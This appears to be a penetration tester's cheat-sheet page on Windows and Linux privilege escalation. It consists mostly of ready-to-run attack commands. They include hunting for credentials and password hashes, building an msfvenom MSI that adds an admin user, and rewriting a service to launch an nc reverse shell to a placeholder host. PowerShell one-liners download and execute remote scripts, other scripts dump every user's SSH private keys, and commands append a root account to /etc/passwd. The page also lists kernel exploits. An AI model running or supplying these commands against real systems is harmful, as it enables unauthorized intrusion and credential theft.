Privilege escalation

One of the fun parts!

Windows

Windows versions

Clients

Windows OS                    Version Number

Windows 1.0                    1.04
Windows 2.0                    2.11
Windows 3.0                    3
Windows NT 3.1                 3.10.528
Windows for Workgroups 3.11    3.11
Windows NT Workstation 3.5     3.5.807
Windows NT Workstation 3.51    3.51.1057
Windows 95                     4.0.950
Windows NT Workstation 4.0     4.0.1381
Windows 98                     4.1.1998
Windows 98 Second Edition      4.1.2222
Windows Me                     4.90.3000
Windows 2000 Professional      5.0.2195
Windows XP                     5.1.2600
Windows Vista                  6.0.6000
Windows 7                      6.1.7600
Windows 8.1                    6.3.9600
Windows 10                     10.0.10240

Servers

Windows NT 3.51                  NT 3.51
Windows NT 3.5                   NT 3.50
Windows NT 3.1                   NT 3.10
Windows 2000                     NT 5.0     

    Windows 2000 Server
    Windows 2000 Advanced Server
    Windows 2000 Datacenter Server

Windows NT 4.0                   NT 4.0     

    Windows NT 4.0 Server
    Windows NT 4.0 Server Enterprise
    Windows NT 4.0 Terminal Server Edition

Windows Server 2003              NT 5.2     

    Windows Small Business Server 2003
    Windows Server 2003 Web Edition
    Windows Server 2003 Standard Edition
    Windows Server 2003 Enterprise Edition
    Windows Server 2003 Datacenter Edition
    Windows Storage Server

Windows Server 2003 R2           NT 5.2     

    Windows Small Business Server 2003 R2
    Windows Server 2003 R2 Web Edition
    Windows Server 2003 R2 Standard Edition
    Windows Server 2003 R2 Enterprise Edition
    Windows Server 2003 R2 Datacenter Edition
    Windows Compute Cluster Server 2003 (CCS)
    Windows Storage Server
    Windows Home Server

Windows Server 2008               NT 6.0     

    Windows Server 2008 Standard
    Windows Server 2008 Enterprise
    Windows Server 2008 Datacenter
    Windows Server 2008 for Itanium-based Systems
    Windows Server Foundation 2008
    Windows Essential Business Server 2008
    Windows HPC Server 2008
    Windows Small Business Server 2008
    Windows Storage Server 2008
    Windows Web Server 2008

Windows Server 2008 R2            NT 6.1     

    Windows Server 2008 R2 Foundation
    Windows Server 2008 R2 Standard
    Windows Server 2008 R2 Enterprise
    Windows Server 2008 R2 Datacenter
    Windows Server 2008 R2 for Itanium-based Systems
    Windows Web Server 2008 R2
    Windows Storage Server 2008 R2
    Windows HPC Server 2008 R2
    Windows Small Business Server 2011
    Windows MultiPoint Server 2011
    Windows Home Server 2011
    Windows MultiPoint Server 2010

Windows Server 2012               NT 6.2     

    Windows Server 2012 Foundation
    Windows Server 2012 Essentials
    Windows Server 2012 Standard
    Windows Server 2012 Datacenter
    Windows MultiPoint Server 2012

Windows Server 2012 R2            NT 6.3     

    Windows Server 2012 R2 Foundation
    Windows Server 2012 R2 Essentials
    Windows Server 2012 R2 Standard
    Windows Server 2012 R2 Datacenter

Windows Server 2016     2016       NT 10.0Windows NT 3.51                  NT 3.51
Windows NT 3.5                   NT 3.50
Windows NT 3.1                   NT 3.10
Windows 2000                     NT 5.0     

    Windows 2000 Server
    Windows 2000 Advanced Server
    Windows 2000 Datacenter Server

Windows NT 4.0                   NT 4.0     

    Windows NT 4.0 Server
    Windows NT 4.0 Server Enterprise
    Windows NT 4.0 Terminal Server Edition

Windows Server 2003              NT 5.2     

    Windows Small Business Server 2003
    Windows Server 2003 Web Edition
    Windows Server 2003 Standard Edition
    Windows Server 2003 Enterprise Edition
    Windows Server 2003 Datacenter Edition
    Windows Storage Server

Windows Server 2003 R2           NT 5.2     

    Windows Small Business Server 2003 R2
    Windows Server 2003 R2 Web Edition
    Windows Server 2003 R2 Standard Edition
    Windows Server 2003 R2 Enterprise Edition
    Windows Server 2003 R2 Datacenter Edition
    Windows Compute Cluster Server 2003 (CCS)
    Windows Storage Server
    Windows Home Server

Windows Server 2008               NT 6.0     

    Windows Server 2008 Standard
    Windows Server 2008 Enterprise
    Windows Server 2008 Datacenter
    Windows Server 2008 for Itanium-based Systems
    Windows Server Foundation 2008
    Windows Essential Business Server 2008
    Windows HPC Server 2008
    Windows Small Business Server 2008
    Windows Storage Server 2008
    Windows Web Server 2008

Windows Server 2008 R2            NT 6.1     

    Windows Server 2008 R2 Foundation
    Windows Server 2008 R2 Standard
    Windows Server 2008 R2 Enterprise
    Windows Server 2008 R2 Datacenter
    Windows Server 2008 R2 for Itanium-based Systems
    Windows Web Server 2008 R2
    Windows Storage Server 2008 R2
    Windows HPC Server 2008 R2
    Windows Small Business Server 2011
    Windows MultiPoint Server 2011
    Windows Home Server 2011
    Windows MultiPoint Server 2010

Windows Server 2012               NT 6.2     

    Windows Server 2012 Foundation
    Windows Server 2012 Essentials
    Windows Server 2012 Standard
    Windows Server 2012 Datacenter
    Windows MultiPoint Server 2012

Windows Server 2012 R2            NT 6.3     

    Windows Server 2012 R2 Foundation
    Windows Server 2012 R2 Essentials
    Windows Server 2012 R2 Standard
    Windows Server 2012 R2 Datacenter

Windows Server 2016     2016       NT 10.0

Users

whoami

echo %username%

Which user privileges do we have?

whoami /priv

Which users are there?

net users

Maybe we are local admin already?

net localgroup administrators

Credential manager

cmdkey /list

Currently cached Kerberos tickets (and maybe some info about other network components)

klist

Are there other logged in users?

qwinsta

Passwords

Password hashes

/usr/share/windows-binaries/fgdump/fgdump.exe
C:\> fgdump.exe
C:\> type 127.0.0.1.pwdump

FGDump - aldeidwww.aldeid.com

If domain controller, search for the "cpassword" within the groups.xml:

findstr /S /I cpassword \\<FQDN>\sysvol\<FQDN>\policies\*.xml

Search for passwords

Search for files that contain "password" in the filename:

dir /s *password*

Search for "password" in files:

findstr /si password *.ini *.xml *.txt
findstr /spin "password" *.*

Some common files:

type c:\sysprep.inf
type c:\sysprep\sysprep.xml
type c:\unattend.xml
type %WINDIR%\Panther\Unattend\Unattended.xml
type %WINDIR%\Panther\Unattended.xml
dir /s *sysprep.inf *sysprep.xml *unattended.xml *unattend.xml *unattend.txt 2>nul

dir c:*vnc.ini /s /b
dir c:*ultravnc.ini /s /b
dir c:\ /s /b | findstr /si *vnc.ini

Moaaahr files:

%windir%\repair\sam
%windir%\System32\config\RegBack\SAM
%windir%\repair\system
%windir%\repair\software
%windir%\repair\security
%windir%\debug\NetSetup.log (AD domain name, DC name, internal IP, DA account)
%windir%\iis6.log (5,6 or 7)
%windir%\system32\logfiles\httperr\httperr1.log
C:\sysprep.inf
C:\sysprep\sysprep.inf
C:\sysprep\sysprep.xml
%windir%\Panther\Unattended.xml
C:\inetpub\wwwroot\Web.config
%windir%\system32\config\AppEvent.Evt (Application log)
%windir%\system32\config\SecEvent.Evt (Security log)
%windir%\system32\config\default.sav
%windir%\system32\config\security.sav
%windir%\system32\config\software.sav
%windir%\system32\config\system.sav
%windir%\system32\inetsrv\config\applicationHost.config
%windir%\system32\inetsrv\config\schema\ASPNET_schema.xml
%windir%\System32\drivers\etc\hosts (dns entries)
%windir%\System32\drivers\etc\networks (network settings)
%windir%\system32\config\SAM (only really useful if you have access to the files while the machine is off)

Unquoted Service Path

wmic service get name,displayname,pathname,startmode |findstr /i "auto" |findstr /i /v "c:\windows\\" |findstr /i /v """

AlwaysInstallElevated

Check if the following registry settings are set to "1"

reg query HKCU\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated

reg query HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated

If so, create your own malicious MSI that will add a local user

msfvenom -p windows/adduser USER=hodor PASS=Qwerty123! -f msi -o hodor.msi

And execute

msiexec /quiet /qn /i C:\hodor.msi

upnp host

sc qc upnphost
sc config upnphost binpath= "C:\nc.exe -nv x.x.x.x -e C:\WINDOWS\System32\cmd.exe"
sc config upnphost obj= ".\LocalSystem" password= ""
sc qc upnphost
net start upnphost

Got an error for a missing dependency?

sc config SSDPSRV start= auto
net start SSDPSRV
net start upnphost

Or just remove the dependency:

sc config upnphost depend= ""

Scheduled tasks

List scheduled tasks

schtasks /query /fo LIST /v

Running processes linked to services

tasklist /SVC

PowerShell tools

PowerUp.ps1

Checks for common Windows privesc vectors

PowerTools/PowerUp/PowerUp.ps1 at master · PowerShellEmpire/PowerToolsGitHub

Download at target:

IEX(New-Object Net.Webclient).downloadString('http://x.x.x.x:8000/PowerUp.ps1')

Add to bottom:

Invoke-AllChecks

Run:

powershell.exe -nop -exec bypass
PS C:\>  Import-Module .\PowerUp.ps1
PS C:\>  Invoke-AllChecks

Sherlock.ps1

Sherlock/Sherlock.ps1 at master · rasta-mouse/SherlockGitHub

Download at target:

IEX(New-Object Net.Webclient).downloadString('http://x.x.x.x:8000/Sherlock.ps1')

Add to bottom:

Find-AllVulns

Run:

powershell.exe -nop -exec bypass
PS C:\>  Import-Module .\Sherlock.ps1
PS C:\>  Find-AllVulns

Nishang

GitHub - samratashok/nishang: Nishang - Offensive PowerShell for red team, penetration testing and offensive security.GitHub

Cross compiling

Compile Windows exploit in Linux

i686-w64-mingw32-gcc 18176.c -lws2_32 -o 18176.exe

Compile Python script to executable

wine ~/.wine/drive_c/Python27/Scripts/pyinstaller.exe --onefile exploit.py

Misc

Windows remote exploits

ms03-026
ms03-039 (1)
ms03-039 (2)
ms03-049
ms04-007
ms04-011 - ssl bof
ms04-011 - lsasarv.dll
ms04-031
ms05-017
1ms05-039
ms06-040 (1)
ms06-040 (2)
ms06-070
ms08-067 (1)
ms08-067 (2)
ms08-067 (3)
ms09-050

Windows local exploits

ms04-011
ms04-019 (1)
ms04-019 (2)
ms04-019 (3)
ms04-020
keybd_event
ms05-018
ms05-055
ms06-030
ms06-049
print spool service
ms08-025
netdde
ms10-015
ms10-059
ms10-092
ms11-080
ms14-040
ms14-058 (1)
ms14-058 (2)
ms14-070 (1)
ms14-070 (2)
ms15-010 (1)
ms15-010 (2)
ms15-051
ms16-014
ms16-016
ms16-032

Precompiled exploits

GitHub - abatchy17/WindowsExploits: Windows exploits, mostly precompiled. Not being updated. Check https://github.com/SecWiki/windows-kernel-exploits instead.GitHub

http://www.bhafsec.com/wiki/index.php/Windows_Privilege_Escalationwww.bhafsec.com

GitHub - SecWiki/windows-kernel-exploits: windows-kernel-exploits Windows平台提权漏洞集合GitHub

Linux

Sudo

cat /etc/sudoers
sudo -l

Becoming a super hero is a fairly straight forward process:

root ALL=(ALL) ALL

The root user can execute from ALL terminals, acting as ALL (any) users, and run ALL (any) command.

john ALL= /sbin/poweroff

The user john can from any terminal, run the command power off using john's user password.

john ALL = (root) NOPASSWD: /usr/bin/scp

The user john can from any terminal, run the command scp as root user without password.

Below a selection of gotmi1k's privesc blog which I use a lot.

Distribution type & kernel version

cat /etc/*release*
uname -a
rpm -q kernel
dmesg | grep -i linux

Default writeable directory / folder

/tmp
/dev/shm

Search for passwords

Search for password within config.php

grep -R 'password' config.php

Search at whole system

find / -type f -exec grep -H 'password' {} \; 2>/dev/null
grep -R -i "password" 2> >(grep -v 'Permission denied' >&2)

Moaaar grepping

grep -i user [filename]
grep -i pass [filename]
grep -C 5 "password" [filename]
find . -name "*.php" -print0 | xargs -0 grep -i -n "var $password"

Find possible other writeable directory / folder

find / -type d \( -perm -g+w -or -perm -o+w \) -exec ls -adl {} \;

Service(s) running as root user

ps aux | grep root
ps -ef | grep root

Installed applications

ls -lah /usr/bin/
ls -lah /sbin/
dpkg -l
rpm -qa
ls -lah /var/cache/apt/archivesO
ls -lah /var/cache/yum/

Scheduled jobs

crontab -l
ls -la /etc/cron*
ls -lah /var/spool/cron
ls -la /etc/ | grep cron
cat /etc/crontab
cat /etc/anacrontab

Search for juicy shizzle

Find pattern in file:

grep -rnw '/etc/passwd' -e 'root'

SSH

https://www.ssh.com/ssh/

Host keys

authorized_keys Contains the signature of the public key of any authorised client(s), in other words specifies the SSH keys that can be used for logging into the user account for which the file is configured. This file lets the server authenticate the user.

id_rsa Contains the private key for the client. This RSA key can be used with SSH protocols 1 or 2.

id_rsa.pub Contains the public key for the client

id_dsa Contains the private key for the client. This (insecure) DSA key only can be used with SSH protocol 2.

id_dsa.pub Contains the public key for the client

known_hosts Contains a list of host signatures for hosts the client has ever connected to.

Search for RSA private keys

#!/bin/bash
for X in $(cut -f6 -d ':' /etc/passwd |sort |uniq); do
    if [ -s "${X}/.ssh/id_rsa" ]; then
        echo "### ${X}: "
        cat "${X}/.ssh/id_rsa"
        echo ""
    fi
done

Search for DSA private keys

#!/bin/bash
for X in $(cut -f6 -d ':' /etc/passwd |sort |uniq); do
    if [ -s "${X}/.ssh/id_dsa" ]; then
        echo "### ${X}: "
        cat "${X}/.ssh/id_dsa"
        echo ""
    fi
done

Sticky bit, SGID, SUID, GUID

Sticky bit

find / -perm -1000 -type d 2>/dev/null

SGID (chmod 2000)

find / -perm -g=s -type f 2>/dev/null

SUID (chmod 4000)

find / -perm -u=s -type f 2>/dev/null
find /* -user root -perm -4000 -print 2>/dev/null

SUID or GUID

find / -perm -g=s -o -perm -u=s -type f 2>/dev/null

Example SUID exploitation

The following file has the SUID bit set:

/usr/bin/nano

We can use this to execute nano and then add a new root user to /etc/passwd. The next step is to create a password "hodor" with salt "hodor":

perl -e 'print crypt("hodor", "hodor"),"\n"'

Add to /etc/passwd using nano:

hodor:how7QNOjM.95M:0:0:root:/root:/bin/bash

Switch to new user:

su hodor

Add user to /etc/passwd and root group

echo hodor::0:0:root:/root:/bin/bash >> /etc/passwd

Enumeration tools

Linenum.sh https://raw.githubusercontent.com/rebootuser/LinEnum/master/LinEnum.sh

LinPrivChecker.py https://github.com/reider-roque/linpostexp/blob/master/linprivchecker.py

Linux local exploits

kernel 2.4.x / 2.6.x (sock_sendpage 1)
kernel 2.4 / 2.6 (sock_sendpage 2)
kernel < 2.6.22 (ftruncate)
kernel < 2.6.34 (cap_sys_admin)
kernel 2.6.27 < 2.6.36 (compat)
kernel < 2.6.36-rc1 (can bcm)
kernel <= 2.6.36-rc8 (rds protocol)
kernel < 2.6.36.2 (half nelson)
kernel <= 2.6.37 (full nelson)
kernel 2.6 (udev)
kernel 3.13 (sgid)
kernel 3.13.0 < 3.19 (overlayfs 1)
kernel 3.14.5 (libfutex)
kernel 2.6.39 <= 3.2.2 (mempodipper)
*kernel 2.6.28 / 3.0 (alpha-omega)
kernel 2.6.22 < 3.9 (Dirty Cow)
kernel 3.7.6 (msr)
*kernel < 3.8.9 (perf_swevent_init)
kernel <= 4.3.3 (overlayfs 2)
kernel 4.3.3 (overlayfs 3)
kernel 4.4.0 (af_packet)
kernel 4.4.x (double-fdput)
kernel 4.4.0-21 (netfilter)
kernel 4.4.1 (refcount)

Precompiled exploits

GitHub - SecWiki/linux-kernel-exploits: linux-kernel-exploits Linux平台提权漏洞集合GitHub

GitHub - xairy/linux-kernel-exploitation: A collection of links related to Linux kernel security and exploitationGitHub

PreviousGaining access NextPost exploitation

Last updated 5 years ago

hashtagWindows

hashtagWindows versions

hashtagClients

hashtagServers

hashtagUsers

hashtagPasswords

hashtagPassword hashes

hashtagSearch for passwords

hashtagUnquoted Service Path

hashtagAlwaysInstallElevated

hashtagupnp host

hashtagScheduled tasks

hashtagPowerShell tools

hashtagPowerUp.ps1

hashtagSherlock.ps1

hashtagNishang

hashtagCross compiling

hashtagMisc

hashtagWindows remote exploits

hashtagWindows local exploits

hashtagPrecompiled exploits

hashtagLinux

hashtagSudo

hashtagDistribution type & kernel version

hashtagDefault writeable directory / folder

hashtagSearch for passwords

hashtagFind possible other writeable directory / folder

hashtagService(s) running as root user

hashtagInstalled applications

hashtagScheduled jobs

hashtagSearch for juicy shizzle

hashtagFind pattern in file:

hashtagSSH

hashtagHost keys

hashtagSearch for RSA private keys

hashtagSearch for DSA private keys

hashtagSticky bit, SGID, SUID, GUID

hashtagExample SUID exploitation

hashtagAdd user to /etc/passwd and root group

hashtagEnumeration tools

hashtagLinux local exploits

hashtagPrecompiled exploits

Windows

Windows versions

Clients

Servers

Users

Passwords

Password hashes

Search for passwords

Unquoted Service Path

AlwaysInstallElevated

upnp host

Scheduled tasks

PowerShell tools

PowerUp.ps1

Sherlock.ps1

Nishang

Cross compiling

Misc

Windows remote exploits

Windows local exploits

Precompiled exploits

Linux

Sudo

Distribution type & kernel version

Default writeable directory / folder

Search for passwords

Find possible other writeable directory / folder

Service(s) running as root user

Installed applications

Scheduled jobs

Search for juicy shizzle

Find pattern in file:

SSH

Host keys

Search for RSA private keys

Search for DSA private keys

Sticky bit, SGID, SUID, GUID

Example SUID exploitation

Add user to /etc/passwd and root group

Enumeration tools

Linux local exploits

Precompiled exploits